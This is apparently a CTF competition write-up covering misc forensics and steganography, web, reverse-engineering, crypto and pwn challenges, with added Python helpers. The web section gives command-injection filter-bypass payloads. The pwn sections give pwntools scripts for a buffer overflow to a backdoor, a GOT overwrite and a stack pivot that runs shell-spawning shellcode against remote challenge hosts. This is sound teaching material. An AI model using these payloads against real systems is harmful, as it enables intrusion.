Contents
MISC
Sign-in
DORAEMON
汝闻,人言否
wireshark
PCXP
WEB
CLICK
Web-sign in
EXEC
REVERSE
hiahia o(*^▽^*)┛
ANDROID
WAY
SPARK
CRYPTO
Easy SignIn
AFFINE
Baby RSA
PWN
Ez pwn
EZPWN
SHALL
MISC: Sign-in
Follow the official WeChat account and send it "HSC2019" to receive the flag.
MISC: DORAEMON
1. The zip comment reads: "Doraemon put the freshly brewed QR code in his pocket, then locked himself away with six digits. Can you find it?"
Brute-forcing a six-digit numeric password gives 376852.
2. Extracting the zip gives an image. Enlarging the height field in the PNG header reveals the lower part of an incomplete QR code that had been cropped away.
3. Repair the two damaged corners of the QR code and scan it to get the flag.
MISC: 汝闻,人言否
1. Opening the file in 010 Editor shows extra data appended at the end. It starts with 4b 50 03 04, which is a zip local-file signature with its first two bytes swapped.
2. Carve the extra data, change the 4b 50 at both the head and the tail back to 50 4b, and save it as a zip. The result is a password-protected zip.
3. The zip comment is qazsedcftrfvgycft6yhntgbnytfvbhyik,.;p, which looks like a keyboard trace. Split per letter:
qazsedcft rfvgy cft6yhn tgbn ytfvbhy ik,.;p
Each group traces one letter on a QWERTY layout, giving the password WVALOU.
4. Extracting gives the flag file. Its header identifies it as WAV; opening it in Audacity and switching to the spectrogram view shows the flag:
flag{e5353bb7b57578bd4da1c898a8e2d767}
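The two PNG tricks used in DORAEMON (an IHDR height that was shrunk to hide part of the image) and here (a zip appended after IEND with its PK signature bytes swapped) can both be handled from a chunk walk. The following is an added example and not code from the writeup; it builds its own tiny PNG and zip so that it runs offline, derives the real height from the inflated IDAT data instead of guessing it, and fixes the IHDR CRC, which is the step people usually forget when patching the height by hand.

```python
import io
import struct
import zipfile
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
CHANNELS = {0: 1, 2: 3, 3: 1, 4: 2, 6: 4}   # samples per pixel by PNG colour type


def png_chunks(data):
    """Yield (offset, type, body) for every chunk up to and including IEND."""
    if data[:8] != PNG_SIG:
        raise ValueError("not a PNG")
    off = 8
    while off + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[off:off + 8])
        yield off, ctype, data[off + 8:off + 8 + length]
        off += 12 + length
        if ctype == b"IEND":
            return


def chunk(ctype, body):
    """Serialise one chunk with a correct CRC (the CRC covers type + body, not the length)."""
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body) & 0xffffffff)


def png_size(png):
    ihdr = next(body for _, t, body in png_chunks(png) if t == b"IHDR")
    return struct.unpack(">II", ihdr[:8])


def true_height(png):
    """Height implied by the pixel data: inflate the IDAT stream and count scanlines (8-bit depth only)."""
    ihdr = next(body for _, t, body in png_chunks(png) if t == b"IHDR")
    width, depth, colour = struct.unpack(">I", ihdr[:4])[0], ihdr[8], ihdr[9]
    if depth != 8:
        raise NotImplementedError("only 8-bit samples handled here")
    idat = b"".join(body for _, t, body in png_chunks(png) if t == b"IDAT")
    return len(zlib.decompress(idat)) // (1 + width * CHANNELS[colour])   # one filter byte per row


def set_height(png, new_height):
    """Rewrite the IHDR height and its CRC; a stale CRC makes many viewers refuse the file."""
    for off, ctype, body in png_chunks(png):
        if ctype == b"IHDR":
            body = body[:4] + struct.pack(">I", new_height) + body[8:]
            return png[:off] + chunk(ctype, body) + png[off + 12 + len(body):]
    raise ValueError("no IHDR")


def crcs_ok(png):
    return all(struct.unpack(">I", png[off + 8 + len(b):off + 12 + len(b)])[0] == (zlib.crc32(t + b) & 0xffffffff)
               for off, t, b in png_chunks(png))


def split_trailer(data):
    """Separate the PNG proper from anything appended after IEND."""
    for off, ctype, body in png_chunks(data):
        if ctype == b"IEND":
            return data[:off + 12 + len(body)], data[off + 12 + len(body):]
    raise ValueError("no IEND")


def swap_pk(blob, old=b"KP", new=b"PK"):
    """Swap the two signature bytes on the zip local-file, central-directory and end-of-central-directory records."""
    for sig in (b"\x03\x04", b"\x01\x02", b"\x05\x06"):
        blob = blob.replace(old + sig, new + sig)
    return blob


def make_sample():
    """Constructed input (not a challenge file): a 2x2 RGB PNG whose IHDR claims height 1,
    followed by a zip whose signatures were changed from PK to KP."""
    rows = b"".join(b"\x00" + b"\xff\x00\x00" * 2 for _ in range(2))
    png = (PNG_SIG + chunk(b"IHDR", struct.pack(">IIBBBBB", 2, 1, 8, 2, 0, 0, 0))
           + chunk(b"IDAT", zlib.compress(rows)) + chunk(b"IEND", b""))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("flag.txt", "constructed sample")
    return png + swap_pk(buf.getvalue(), b"PK", b"KP")


def triage(data):
    """The whole procedure: claimed vs real height, CRC state of the fixed PNG, files in the repaired trailer."""
    png, trailer = split_trailer(data)
    claimed, real = png_size(png)[1], true_height(png)
    fixed = set_height(png, real)
    names = zipfile.ZipFile(io.BytesIO(swap_pk(trailer))).namelist()
    return claimed, real, crcs_ok(fixed), names


if __name__ == "__main__":
    print(triage(make_sample()))
```

For a real challenge file, replace make_sample() with the bytes read from disk; true_height tells you how many rows the IDAT stream actually holds, which is the value to write back into IHDR.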
MISC: wireshark
1. Carve wireshark.png out of wireshark.zip.
2. LSB steganography in wireshark.png hides another image, a QR code; scanning it gives: wrsak..iehr370
3. Rail-fence decoding of wrsak..iehr370 (two rails) gives: wireshark3.7.0
4. Extract wireshark.zip with the password wireshark3.7.0 to get a file named wireshark.
5. The file looks like a PDF but its header is damaged; after repairing the header it opens as the Wireshark user manual.
6. Viewing the PDF in 010 Editor reveals long runs of whitespace made of 0x09 (tab) and 0x20 (space). Extract those runs and replace 0x20 with 0x30 ('0') and 0x09 with 0x31 ('1') to obtain the bit strings below.
7. Convert the bit strings to characters:
# each entry is one character; the widths vary because leading zero bits were not kept
c = [
    "1110100", "1111000", "1110100", "1100110", "1101100", "1100001", "1100111",
    "1111011", "1000111", "1101111", "110000", "1100100", "1001010", "110000",
    "1000010", "1011111", "1111001", "110000", "1110101", "1100110", "1001001",
    "1101110", "1100100", "1001100", "1110100", "1111101",
]
flag = ""
for bits in c:
    flag += chr(int(bits, 2))
print(flag)
# txtflag{Go0dJ0B_y0ufIndLt}
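Steps 3 and 6 above are done by hand in the writeup. The block below is an added example, not from the original page: it implements the two-rail fence decode and the tab/space extraction end to end, starting from a raw byte blob rather than from already-extracted bit strings. The carrier it operates on is a constructed PDF-like fragment; the exact layout of the stego lines in the real manual (one character per newline-terminated run, no leading zeros) is an assumption taken from the variable-width bit strings shown above.

```python
import re


def rail_fence2_decode(ct):
    """Two-rail fence: the ciphertext is the characters at even positions followed by those at odd positions."""
    half = (len(ct) + 1) // 2
    top, bottom = ct[:half], ct[half:]
    return "".join(top[i // 2] if i % 2 == 0 else bottom[i // 2] for i in range(len(ct)))


def whitespace_encode(text):
    """Hide text as runs of tab (1) and space (0), one character per newline-terminated line.
    Assumed layout, chosen to match the bit strings the writeup extracted."""
    lines = []
    for ch in text:
        bits = format(ord(ch), "b")                      # no leading zeros, like the writeup's strings
        lines.append(bits.replace("1", "\t").replace("0", " ").encode())
    return b"\n".join(lines) + b"\n"


def extract_bit_strings(blob, min_len=6):
    """Pull every run of tab/space bytes out of a blob and apply the 09 -> '1', 20 -> '0' mapping.
    Runs shorter than min_len (ordinary single spaces in PDF syntax) are noise and are dropped;
    every printable ASCII character needs at least 6 bits, so 6 is a safe cut-off."""
    runs = re.findall(rb"[\t ]+", blob)
    return [r.replace(b"\t", b"1").replace(b" ", b"0").decode() for r in runs if len(r) >= min_len]


def bits_to_text(bit_strings):
    return "".join(chr(int(b, 2)) for b in bit_strings)


def recover(blob):
    return bits_to_text(extract_bit_strings(blob))


# Constructed carrier (not the challenge file): PDF syntax with the stego lines embedded between objects.
SAMPLE = (b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n"
          + whitespace_encode("flag{Go0dJ0B_y0ufIndLt}")
          + b"2 0 obj\n<< /Type /Pages /Count 0 >>\nendobj\n")

if __name__ == "__main__":
    print(rail_fence2_decode("wrsak..iehr370"))
    print(recover(SAMPLE))
```

On a real file, pass the carved PDF bytes to recover(); if the hidden characters were written with fixed 8-bit groups instead, the min_len filter still works but the encoder above would need to pad with leading spaces.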
MISC: PCXP
1. vol -f PCXP2.raw --profile=WinXPSP2x86 filescan | grep -E 'png|jpg|gif|zip|rar|7z|pdf|txt|doc'
2. vol -f PCXP2.raw --profile=WinXPSP2x86 dumpfiles -Q 0x000000000227db70 -D ./
This yields ffflaaagggg.rar. A second file, ffflaaagggg.zip, was dumped as well but turned out to be irrelevant.
3. vol -f PCXP1.raw --profile=WinXPSP2x86 filescan | grep -E 'png|jpg|gif|zip|rar|7z|pdf|txt|doc|flag'
4. vol -f PCXP1.raw --profile=WinXPSP2x86 dumpfiles -Q 0x00000000021221e0 -D ./
This yields mirror.rar.
5. Extracting it gives mirror.png. In 010 Editor the second half of the file contains extra data stored byte-reversed. Carve it out and reverse it to obtain the key:
HSC-1th202248H
6. Extract ffflaaagggg.rar with that key to get secret.pcap. foremost carves two PNGs out of the pcap; extracting the watermark hidden in them gives:
flag{Wat3rMarkPtysc}
WEB: CLICK
The page asks for 28800 clicks; the counter lives in client-side JavaScript.
1. In the browser console set the counter directly: var2=28800
2. One more click then produces the flag.
WEB: Web-sign in
1. Following the hint, request /robots.txt:
User-agent: *
Disallow:
Disallow: fiag_ls_h3re.php
2. Visiting fiag_ls_h3re.php shows a "not here" message, and right-click and F12 are blocked.
3. Disable JavaScript with a browser extension and view the page source to find the flag.
WEB: EXEC
1. The command passes through a filter before it is executed, so the filter has to be bypassed:
Filtered command names can be bypassed by doubling them: the filter deletes the keyword in a single pass, so llss becomes ls after "ls" is removed from the middle.
Spaces are blocked; $IFS expands to whitespace and separates arguments just as well.
Command output is not echoed, so redirect it into a file with > and then request that file to read the result.
2. Commands used:
cmd=llss$IFS/>1
cmd=cacatt$IFS/ctf_is_fun_flflagag2021>1
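The bypass works because the filter deletes fragments instead of rejecting the request. The following is an added example, not the challenge's own code: it models that deleting filter, shows what the shell sees after $IFS expansion, and puts a rejecting allowlist next to it. The denylist (cat, ls, flag) is an assumption; the page only shows that those three words and spaces are stripped.

```python
import re
import shlex

DENYLIST = ("cat", "ls", "flag")       # assumed; inferred from the payloads that worked
ALLOWED_COMMANDS = {"id", "whoami", "date"}


def naive_filter(cmd):
    """Model of the challenge filter: each denylisted word is removed by a single str.replace pass
    and spaces are dropped. Because the check deletes rather than rejects, 'llss' collapses to 'ls'."""
    for word in DENYLIST:
        cmd = cmd.replace(word, "")
    return cmd.replace(" ", "")


def shell_view(filtered):
    """What sh executes: an unquoted $IFS expands to ' \\t\\n' and is subject to field splitting,
    so it separates words exactly like a literal space."""
    return filtered.replace("$IFS", " ")


def exploit_chain(cmd):
    """Attacker input -> filter -> shell; the two payloads from the writeup survive this chain."""
    return shell_view(naive_filter(cmd))


def strict_filter(cmd):
    """Hardened form: tokenise, require an allowlisted program and a tight character set for every
    token, and reject otherwise. Deleting nothing means there is nothing to reassemble."""
    try:
        argv = shlex.split(cmd)
    except ValueError:
        return False
    if not argv or argv[0] not in ALLOWED_COMMANDS:
        return False
    return all(re.fullmatch(r"[A-Za-z0-9_./-]+", tok) for tok in argv)


if __name__ == "__main__":
    for payload in ("ls /", "llss$IFS/>1", "cacatt$IFS/ctf_is_fun_flflagag2021>1"):
        print(repr(payload), "->", repr(naive_filter(payload)), "->", repr(exploit_chain(payload)),
              "| strict:", strict_filter(payload))
```

The honest attempt `ls /` is destroyed by the filter while the doubled form survives, which is exactly why denylist-and-strip filters fail; the strict variant refuses both, and in real code the allowlisted argv should be run with shell=False so no expansion happens at all.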
REVERSE: hiahia o(*^▽^*)┛
The IDA pseudocode shows the logic:
qmemcpy(v4, "igdb~Mumu@p&>%;%<$
The code first transforms v4 and only then compares it with the input flag. Patch the comparison so the program does not exit when it fails, set a breakpoint at the return, and read v4 from memory; alternatively, reverse the transformation of v4 directly.
REVERSE: ANDROID
# Arrays taken from the APK: iArr holds the stored ciphertext, iArr2 is the table the check compares against
iArr = [102, 13, 99, 28, 127, 55, 99, 19, 109, 1, 121, 58, 83, 30, 79, 0, 64, 42]
iArr2 = [42, 42, 42, 42, 42, 42, 42, 42, 42, 42, 42, 42, 42, 42, 42, 42, 42, 42]
# the check in the APK: iArr2 == iArr
# exp: apply the two XOR passes to iArr to get back flag{xxxx}
for i in range(17):
    if i % 2 == 0:
        iArr[i] ^= i              # even positions are XORed with their index
for i in range(17):
    if i % 2 != 0:
        iArr[i] ^= iArr[i + 1]    # odd positions are XORed with the following, already restored byte
print(bytes(iArr))                # index 17 is not touched by either loop
REVERSE: WAY
1. Remove the UPX packing:
upx -d maze-upx.exe
2. IDA analysis yields the maze string OIIIIOOIO#IOOOIIOIOIIIIII, which laid out five cells wide is:
OIIII
OOIO#
IOOOI
IOIOI
IIIII
3. Walking it by hand (O is passable, I is a wall, # is the exit) gives the key sequence sdsddwd.
4. The flag is the MD5 of that sequence.
exp:
m = 'OIIIIOOIO#IOOOIIOIOIIIIII'
for i in range(0, len(m), 5):
    print(m[i:i + 5])
'''
OIIII
OOIO#
IOOOI
IOIOI
IIIII
'''
# path: sdsddwd
import hashlib
print(hashlib.md5(b"sdsddwd").hexdigest())
# flag{6654b3343f6f3f6223a721e7f65e87f8}
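Tracing the maze by hand works for a 5x5 grid but not for the larger ones these challenges often ship. The block below is an added example, not part of the writeup: a breadth-first search over the same grid that returns the key sequence and builds the flag from it. It assumes the start is the top-left cell, that O cells are passable and I cells are walls, and that w/s/a/d mean up/down/left/right; all three are consistent with the hand-found path.

```python
import hashlib
from collections import deque

MAZE = "OIIIIOOIO#IOOOIIOIOIIIIII"     # string from the binary, as in the writeup
SIDE = 5
# key -> (row delta, column delta); assumed WASD layout
MOVES = (("w", -1, 0), ("s", 1, 0), ("a", 0, -1), ("d", 0, 1))


def parse_maze(s, side):
    if len(s) % side:
        raise ValueError("maze string is not a whole number of rows")
    return [s[i:i + side] for i in range(0, len(s), side)]


def solve_maze(grid, start=(0, 0), goal="#"):
    """Shortest key sequence from start to the goal cell, or None if unreachable.
    BFS explores cells in move order, so the first path that reaches '#' is a shortest one."""
    rows, cols = len(grid), len(grid[0])
    if grid[start[0]][start[1]] == "I":
        raise ValueError("start cell is a wall")
    queue = deque([(start, "")])
    seen = {start}
    while queue:
        (r, c), path = queue.popleft()
        if grid[r][c] == goal:
            return path
        for key, dr, dc in MOVES:
            nr, nc = r + dr, c + dc
            if 0 <= nr < rows and 0 <= nc < cols and grid[nr][nc] != "I" and (nr, nc) not in seen:
                seen.add((nr, nc))
                queue.append(((nr, nc), path + key))
    return None


def flag_from_maze(maze=MAZE, side=SIDE):
    path = solve_maze(parse_maze(maze, side))
    if path is None:
        raise ValueError("no route to the exit")
    return "flag{" + hashlib.md5(path.encode()).hexdigest() + "}"


if __name__ == "__main__":
    grid = parse_maze(MAZE, SIDE)
    print("\n".join(grid))
    print(solve_maze(grid))
    print(flag_from_maze())
```

If a binary treats the moves differently (for example hjkl, or a different start cell), only MOVES and the start argument need changing; the search itself is unchanged.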
REVERSE: SPARK
IDA could not analyse the binary, so Ghidra was used to obtain pseudocode. The algorithm is simple to invert:
exp:
# the two 8-byte constants the binary compares against, as found in the Ghidra output
a = '37463f3044413243'
b = '3429000000000000'
enc = bytes.fromhex(a + b)[:10]     # only the first 10 bytes carry data
flag = ''
for i in range(10):
    flag += chr((enc[i] + 0x2f) & 0xff)   # undo the per-byte transform by adding 0x2f back
print(flag)
CRYPTO: Easy SignIn
Challenge:
5445705857464579517A4A48546A4A455231645457464243566B5579556C7053546C4A4E524564565646644D515670455130354C5755644F5231685256314A5452315A5552304E57576C5A49525430395054303950513D3D
exp (hex, then base64, base32 and base64 again):
a='5445705857464579517A4A48546A4A455231645457464243566B5579556C7053546C4A4E524564565646644D515670455130354C5755644F5231685256314A5452315A5552304E57576C5A49525430395054303950513D3D'
import base64
flag = bytes.fromhex(a)          # layer 1: hex
flag = base64.b64decode(flag)    # layer 2: base64
flag = base64.b32decode(flag)    # layer 3: base32
flag = base64.b64decode(flag)    # layer 4: base64
print(flag)
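The script above hard-codes the order of the layers after recognising them by eye. As an added example that is not part of the writeup, the decoder below recognises each layer from its alphabet and padding, accepts a decode only when the output is still printable text, and stops when nothing validates any more. The detection order (hex, then base32, then base64) matters: a hex string is also a valid base64 alphabet, so the most restrictive alphabet is tried first. The round-trip sample is constructed here; the challenge string is decoded as well.

```python
import base64
import binascii
import re

HEX_RE = re.compile(rb"[0-9A-Fa-f]+")
B32_RE = re.compile(rb"[A-Z2-7]+={0,6}")
B64_RE = re.compile(rb"[A-Za-z0-9+/]+={0,2}")


def looks_like_text(b):
    return len(b) > 0 and all(0x20 <= x < 0x7f or x in (9, 10, 13) for x in b)


def peel_once(data):
    """Try the decoders from the most to the least restrictive alphabet; accept the first one whose
    input validates (alphabet, padding, length) and whose output is printable text."""
    s = data.strip()
    candidates = []
    if HEX_RE.fullmatch(s) and len(s) % 2 == 0:
        candidates.append(("hex", lambda: binascii.unhexlify(s)))
    if B32_RE.fullmatch(s) and len(s) % 8 == 0:
        candidates.append(("base32", lambda: base64.b32decode(s)))
    if B64_RE.fullmatch(s) and len(s) % 4 == 0:
        candidates.append(("base64", lambda: base64.b64decode(s, validate=True)))
    for name, decode in candidates:
        try:
            out = decode()
        except (binascii.Error, ValueError):
            continue
        if looks_like_text(out):
            return name, out
    return None, data


def peel(data, max_layers=16):
    """Strip encoding layers until nothing validates; returns (layer names, innermost bytes)."""
    layers = []
    for _ in range(max_layers):
        name, nxt = peel_once(data)
        if name is None:
            break
        layers.append(name)
        data = nxt
    return layers, data


# Constructed sample: plaintext wrapped as base64 -> base32 -> base64 -> hex, i.e. the challenge's layering.
SAMPLE = binascii.hexlify(base64.b64encode(base64.b32encode(base64.b64encode(b"flag{hsc}")))).upper()

# The challenge string itself, as given in the writeup.
CHALLENGE = (b"5445705857464579517A4A48546A4A455231645457464243566B5579556C7053546C4A4E524564565646644D"
             b"515670455130354C5755644F5231685256314A5452315A5552304E57576C5A49525430395054303950513D3D")

if __name__ == "__main__":
    print(peel(SAMPLE))
    print(peel(CHALLENGE))
```

The printable-output check is what keeps a hex string of ordinary text from being misread as base64: the base64 decode of such a string yields binary garbage, which is rejected, and the hex decoder wins.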
CRYPTO: AFFINE
Affine cipher over a 62-symbol alphabet. Brute-force a and b using the fact that the plaintext contains 'flag', then decrypt and hash.
exp:
# -*- coding: utf-8 -*-
import string
import hashlib
import gmpy2

letter = string.ascii_letters + string.digits     # the 62-symbol alphabet used by the challenge


def affine_encode(m, a, b, origin="abcdefghijklmnopqrstuvwxyz"):
    r = ""
    for i in m:
        if origin.find(i) != -1:
            r += origin[(a * origin.index(i) + b) % len(origin)]
        else:
            r += i
    return r


def affine_decode(c, a, b, origin="abcdefghijklmnopqrstuvwxyz"):
    r = ""
    n = len(origin)
    try:
        ai = gmpy2.invert(a, n) % n          # raises ZeroDivisionError when gcd(a, n) != 1
        for i in c:
            if origin.find(i) != -1:         # symbols outside the alphabet pass through unchanged
                r += origin[(ai * (origin.index(i) - b)) % n]
            else:
                r += i
        return r
    except ZeroDivisionError:
        return ""


c = "xGJ13kkRK9QDfORQomFOf9NZs9LKVZvGqVIsVO9NOkorv"
for a in range(100):
    for b in range(100):
        ff = affine_decode(c, a, b, letter)
        if 'flag' in ff:
            print(a, b, ff)

result = 'Oh62Affine1sSti1lN0tSecureEnoughToProtectflag'
flag = hashlib.md5(result.encode()).hexdigest()
print("flag{" + flag + "}")
# 11 17 Oh62Affine1sSti1lN0tSecureEnoughToProtectflag
# 11 79 Oh62Affine1sSti1lN0tSecureEnoughToProtectflag
# 73 17 Oh62Affine1sSti1lN0tSecureEnoughToProtectflag
# 73 79 Oh62Affine1sSti1lN0tSecureEnoughToProtectflag
# (the four hits are the same key: 73 = 11 + 62 and 79 = 17 + 62)
# flag{2b9b99caae1cc49e5b5aacbc8cc22350}
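Brute force over a and b is cheap for n = 62, but the known crib also determines the key algebraically: two plaintext/ciphertext pairs give a = (c1 - c2)(p1 - p2)^-1 mod n and b = c1 - a*p1 mod n, so sliding 'flag' along the ciphertext needs at most one modular inversion per offset. The block below is an added example, not from the writeup; it uses the same ciphertext and 62-symbol alphabet, and pow(a, -1, n) (Python 3.8+) instead of gmpy2. Because n is composite, the pair of crib symbols is chosen so that their index difference is invertible, and a is rejected unless it is invertible too.

```python
import string
from math import gcd

ALPHABET = string.ascii_letters + string.digits    # the writeup's 62-symbol alphabet
CT = "xGJ13kkRK9QDfORQomFOf9NZs9LKVZvGqVIsVO9NOkorv"


def affine_decrypt(ct, a, b, alphabet=ALPHABET):
    """x = a^-1 (y - b) mod n; symbols outside the alphabet pass through unchanged."""
    n = len(alphabet)
    a_inv = pow(a, -1, n)                      # ValueError if gcd(a, n) != 1
    out = []
    for ch in ct:
        i = alphabet.find(ch)
        out.append(ch if i < 0 else alphabet[(a_inv * (i - b)) % n])
    return "".join(out)


def solve_with_crib(ct, crib, alphabet=ALPHABET):
    """Slide the crib along the ciphertext. At each offset solve (a, b) from two crib positions
    whose plaintext indices differ by an invertible amount, then use the remaining crib characters
    as a check. Returns every (offset, a, b, plaintext) that survives."""
    n = len(alphabet)
    p = [alphabet.index(ch) for ch in crib]
    pair = next(((i, j) for i in range(len(p)) for j in range(len(p))
                 if i != j and gcd((p[i] - p[j]) % n, n) == 1), None)
    if pair is None:
        raise ValueError("no two crib symbols differ by an invertible amount mod n")
    i, j = pair
    diff_inv = pow((p[i] - p[j]) % n, -1, n)
    hits = []
    for off in range(len(ct) - len(crib) + 1):
        c = [alphabet.find(ch) for ch in ct[off:off + len(crib)]]
        if min(c) < 0:                          # crib cannot sit on a non-alphabet symbol
            continue
        a = (c[i] - c[j]) * diff_inv % n
        if gcd(a, n) != 1:                      # not a valid affine key
            continue
        b = (c[i] - a * p[i]) % n
        if all((a * p[k] + b) % n == c[k] for k in range(len(p))):
            hits.append((off, a, b, affine_decrypt(ct, a, b, alphabet)))
    return hits


if __name__ == "__main__":
    for off, a, b, pt in solve_with_crib(CT, "flag"):
        print(f"offset {off}: a={a} b={b} -> {pt}")
```

With the crib 'flag', the pair chosen is ('f', 'a') because 5 - 0 = 5 is coprime to 62, whereas 'f' and 'l' differ by 6 and would not be invertible.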
CRYPTO: Baby RSA
1. Recover the high bits of p. The given key stream is the LFSR output XORed with the bits of p, so clocking the same LFSR from the same seed and XORing again returns the top 568 bits of p:
def lfsr(status, mask):
    """One step of the 32-bit Fibonacci LFSR: shift left, new low bit = parity of (status & mask)."""
    out = (status << 1) & 0xffffffff
    i = (status & mask) & 0xffffffff
    lastbit = 0
    while i != 0:
        lastbit ^= (i & 1)
        i = i >> 1
    out ^= lastbit
    return (out, lastbit)


status = 1
mask = 0b10110001110010011100100010110101
p = ''
key='0101110100100111011011011000111010000111101000101010100100100011010111011000010010100101110110011101110110010100010111001110010011101010111011001100011011010110001010011111111110100110101010101110100110011010110101110110000110010101010000010110100110110110001110101011000011110100011011100101101101001000110010100111000111001111010101011011111110010111100101111001010000100010100001000111010011011111010011101100011101011010011010110001101110110110000110010011001101100000110000110100101010010010110101100101111101110000010011101110010101110100011101100110111111001010'
#key='0001001001110010101000100011011111010000000011000111111010101110010101111011110001101011001110101010001011000011101101000110011001011110111001111110110110011001011100000010110000000100100000101100100111011000000011101101110010001100011110001100010001101010101011101000100100100010011111111110001111100001011110110011010000011000101110110001010110000111111010011010111011101000101101101110011101000110010001011111001111000010001011010101001110100001111010000010010111111100000001011010100100111000111101101100110101000010111100010100000111110100000111001111101001000000'
for i in range(568):
    curnum = int(key[i])
    (status, out) = lfsr(status, mask)
    p += str(curnum ^ out)
print(p)
# p = p + '0' * (1024 - 568)
p = int(p, 2)
print("p=", hex(p))
Recovered high bits of p: 0x807c1395b8128e6de865ab20dd2a39684f6831464553c65215cfe2861192657b6938d227c75e902ae858fdbd8b118c8522c08a3bf978bb203bc1644fe526f2de55b065b0507958
Only 568 high bits of p are known, but 576 are needed for the lattice step to recover the rest, so the 8 bits directly below the known ones are brute-forced.
Sage script (written so it also runs as plain Python with sage.all imported):
from sage.all import *
n = 9363543374665338283861145656340115756598328744870620756798779080826725774691364161648335378062705433999048117564356637094421930886166369832353405527855104576202658647651524758179962855692461154859961903531990172279764099199157181167775307950690492969859829926808950964120678082460448847927074487568619536568740301649988555476490206693181162301088156855926656544441682939839165455244630182978802660669255401576213941067679888164237586879364615664942234247896214195262510935345922512831632385741735810122730130366521612834556565838623708828780093323310348242654778247293430853566054703991781432542625271396246500576703
cipher = 3641304537029815746727163894554557322382012539953948183406308231174259571263608621970973671202001456955622458371303424750815017578104069924877881162707673935496925529412748663209884628320657034190702348924814794263041483260377960569530869386619921425415323912964305979776909598200202236912823968867485696101691879580799000240715778010424877093758489309380968229017074542588151574195295436881889313935734282141447498134543053106463951864974512375314091440713165047188590693431938599822340588934591712592995622334522799914563528630705687647950894928965913199772209825508001274120556508220248069647851360567609656517789
e2 = 65537
pbits = 1024
for i in range(256):      # the 8 unknown bits below the 568 recovered ones (a 00 byte is already appended)
    p4 = Integer(0x807c1395b8128e6de865ab20dd2a39684f6831464553c65215cfe2861192657b6938d227c75e902ae858fdbd8b118c8522c08a3bf978bb203bc1644fe526f2de55b065b050795800) + i
    print(hex(p4))
    kbits = pbits - p4.nbits()    # number of low bits still unknown
    print(p4.nbits())
    p4 = p4 << kbits
    PR = PolynomialRing(Zmod(n), 'x')
    x = PR.gen()
    f = x + p4
    roots = f.small_roots(X=2**kbits, beta=0.4)   # Coppersmith: small root of f modulo a factor of n
    # print(roots)
    if roots:                                     # success: rebuild p from the root
        p = p4 + int(roots[0])
        print("p: ", hex(int(p)))
        assert n % p == 0
        q = n // int(p)
        print("q: ", hex(int(q)))
        print(gcd(p, q))
        phin = (p - 1) * (q - 1)
        print(gcd(e2, phin))
        d = inverse_mod(e2, phin)
        flag = int(pow(cipher, d, n))
        print(flag.to_bytes((flag.bit_length() + 7) // 8, "big"))
        break
PWN: Ez pwn
#encoding=utf-8
from pwn import *

fpath = '/mnt/d/ctf/ti/hscctf2022/pwn-Ez_pwn/pwn'
#r = process(fpath)
r = remote("hsc2019.site", 10144)
backdoor = 0x400741
# 64-byte buffer, then the saved rbp, then the return address. The chain returns to 0x400740 first
# and then into the backdoor; 0x400740 is presumably a lone ret that keeps the stack 16-byte aligned
# before the backdoor runs (an assumption; the page only gives the two addresses).
payload = b"a" * 64 + p64(0) + p64(0x400740) + p64(backdoor)
r.sendline(payload)
r.interactive()
PWN: EZPWN
#encoding=utf-8
from pwn import *

fpath = '/mnt/d/ctf/ti/hscctf2022/pwn-EZPWN/pwn'
#r = process(fpath)
r = remote("hsc2019.site", 10456)
elf = ELF(fpath)
backdoor = 0x400796
# The program offers a write of attacker-chosen data to an attacker-chosen address. Point it at
# printf's GOT entry and store the backdoor address there, so the next printf call runs the backdoor.
r.sendlineafter(b"your ID?", b'aa')
r.sendlineafter(b"Give me the target address?", str(elf.got['printf']).encode())
r.sendlineafter(b"Give me the data: ", p64(backdoor))
r.interactive()
PWN: SHALL
In the memory around 0x600000, look for a slot that stores an address at least 0x50 bytes above the slot itself. One is at 0x600088:
0x600088 —▸ 0x60010c (hello)
So set start's rbp to 0x600088. main then writes its data at rbp + 0x50 = 0x600088 + 0x50 = 0x6000D8, which reaches start's return address and lets it be overwritten with 0x60010c, and the shellcode is written at 0x60010c.
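The search described above (a qword in a writable region that points further ahead in the same region) is easy to automate over a dumped segment. The block below is an added example and not the writeup's code: it scans a constructed image of the segment at 0x600000 (not the challenge binary), reports every slot that satisfies the 0x50-byte constraint, and computes the rbp-relative write address that the frame would use for each hit. The 0x50 frame offset is the one the analysis above uses.

```python
import struct


def find_pivot_slots(segment, base, min_ahead=0x50, align=8):
    """Return (slot_address, stored_pointer) for every aligned qword in `segment` (mapped at `base`)
    whose value points into the same segment at least `min_ahead` bytes past the slot itself."""
    hits = []
    end = base + len(segment)
    for off in range(0, len(segment) - 7, align):
        val = struct.unpack_from("<Q", segment, off)[0]
        if base + off + min_ahead <= val < end:
            hits.append((base + off, val))
    return hits


def pivot_plan(segment, base, frame_write_offset=0x50):
    """For each usable slot: the new rbp, where a write at rbp + frame_write_offset lands,
    and the pointer that write can overwrite or redirect control to."""
    return [(slot, slot + frame_write_offset, target)
            for slot, target in find_pivot_slots(segment, base, min_ahead=frame_write_offset)]


def build_sample():
    """Constructed 0x200-byte image of a segment at 0x600000 (not the challenge binary): one slot at
    +0x88 points to 0x60010c; a decoy at +0x10 points only 8 bytes ahead; one at +0x20 points backwards."""
    seg = bytearray(0x200)
    struct.pack_into("<Q", seg, 0x88, 0x60010c)
    struct.pack_into("<Q", seg, 0x10, 0x600018)
    struct.pack_into("<Q", seg, 0x20, 0x600000)
    return bytes(seg)


if __name__ == "__main__":
    for slot, write_at, target in pivot_plan(build_sample(), 0x600000):
        print(f"rbp={slot:#x} write lands at {write_at:#x}, slot holds {target:#x}")
```

On a live target the segment bytes come from the binary's writable section or from a gdb dump; the same scan also flags candidates when the frame offset is different, by changing frame_write_offset.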
#encoding=utf-8
from pwn import *

context(os='linux', arch='amd64')
fpath = '/mnt/d/ctf/ti/hscctf2022/pwn-SAHELL/pwn'
#r = process(fpath)
r = remote("hsc2019.site", 10655)
shellcode = asm(shellcraft.sh())
#gdb.attach(r, 'b *0x4000cb')
# first input: padding up to the saved rbp, the pivoted rbp 0x600088, the return into 0x4000FB,
# then the two values that land in the new frame (0 and the shellcode address 0x60010C), per the analysis above
payload = b'\0' * 0x1a0 + p64(0x600088) + p64(0x4000FB) + p64(0) + p64(0x60010C)
r.sendline(payload)
# second input: NOP sled followed by the shellcode, which ends up at 0x60010C
